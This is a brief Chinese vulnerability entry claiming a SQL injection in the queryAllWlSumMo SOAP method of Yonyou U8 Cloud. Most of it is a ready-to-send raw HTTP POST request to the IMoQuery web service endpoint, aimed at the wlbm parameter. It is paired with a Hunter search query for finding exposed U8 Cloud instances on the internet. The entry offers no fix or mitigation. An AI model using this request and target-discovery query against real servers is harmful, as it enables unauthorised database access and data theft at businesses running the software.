用友U8 Cloud queryAllWlSumMo存在SQL注入漏洞
一、漏洞描述
用友U8 Cloud queryAllWlSumMo存在SQL注入漏洞
二、影响版本
- 用友U8 Cloud
三、资产测绘
- hunter
app.name="用友 U8 Cloud"
- 登录页面
四、漏洞复现
POST /uapws/service/nc.ws.itf.mm.mobile.IMoQuery HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=1EEDC1D7DC0B27ABD0731F81178DC50D.server; JSESSIONID=8BDDF6D86AFB789CF58994EC3E00DB3B.server
Upgrade-Insecure-Requests: 1
SOAPAction: urn:queryAllWlSumMo
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 370
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imoq="http://mobile.mm.itf.ws.nc/IMoQuery">
<soapenv:Header/>
<soapenv:Body>
<imoq:queryAllWlSumMo>
<moQueryVO>
<!--type: string-->
<wlbm>gero et</wlbm>
</moQueryVO>
</imoq:queryAllWlSumMo>
</soapenv:Body>
</soapenv:Envelope>